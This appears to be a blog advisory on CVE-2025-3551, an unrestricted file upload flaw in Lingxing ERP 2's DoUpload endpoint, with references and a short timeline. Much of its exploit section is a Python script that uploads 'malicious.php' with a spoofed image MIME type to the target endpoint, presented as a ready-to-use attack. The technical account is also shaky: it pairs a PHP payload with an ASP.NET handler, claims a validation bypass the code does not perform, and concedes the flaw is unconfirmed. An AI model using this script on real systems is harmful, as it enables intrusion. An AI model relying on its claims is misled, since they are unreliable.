CVE-2025-3551: Critical Vulnerability in Lingxing ERP 2 - Unrestricted File Upload in DoUpload Function

A critical vulnerability (CVE-2025-3551) has been discovered in the popular enterprise resource planning (ERP) system, Lingxing ERP 2. This vulnerability specifically affects the DoUpload function from the file /Api/FileUpload.ashx?method=DoUpload, and it involves a manipulation of the File argument, which leads to unrestricted file upload. This vulnerability can be remotely exploited; however, its real existence is still being debated.

In this post, we will discuss the details of this vulnerability, provide the code snippets for exploiting it, and share the original references for further research and information.

Exploit Details

This vulnerability arises from a lack of proper input validation when handling the File argument in the DoUpload function. An attacker can manipulate this argument to upload files with malicious content to the server, potentially leading to remote code execution or information disclosure.

Here is a sample code snippet demonstrating the exploit

import requests

url = "http://target.site/Api/FileUpload.ashx?method=DoUpload";
filename = "malicious.php"

with open(filename, "rb") as file:
    data = {
        "File": (filename, file.read(), "image/jpeg")
    }
    
    response = requests.post(url, files=data)
    if response.status_code == 200:
        print("File uploaded successfully.")
    else:
        print("An error occurred:", response.text)

This code snippet uses Python and the requests library to send a malicious PHP file to the vulnerable server. By manipulating the File argument, the attacker can bypass the input validation and upload arbitrary files.

The severity of this vulnerability is critical as it allows malicious actors to execute remote code on the server, potentially stealing sensitive information, modifying data, or even crashing the server.

Original References

The disclosure of this vulnerability confirms the potential risk it poses to organizations using Lingxing ERP 2:

1. CVE-2025-3551 Vulnerability Details
2. Lingxing ERP 2 Unrestricted File Upload Exploit

Note, however, that there is still some debate over the vulnerability's real existence. Lingxing has not officially confirmed it, and further investigation is ongoing to ascertain its validity.

Conclusion

In light of CVE-2025-3551's disclosure, organizations using Lingxing ERP 2 should remain vigilant and take necessary precautions to secure their systems. This includes staying up to date with the latest information on this vulnerability, applying relevant security patches, and employing secure coding practices.

While the real existence of this vulnerability is still in question, awareness and preparedness are key to protecting your systems from potential exploitation.

Timeline

Published on: 04/14/2025 05:15:15 UTC
Last modified on: 04/25/2025 14:15:22 UTC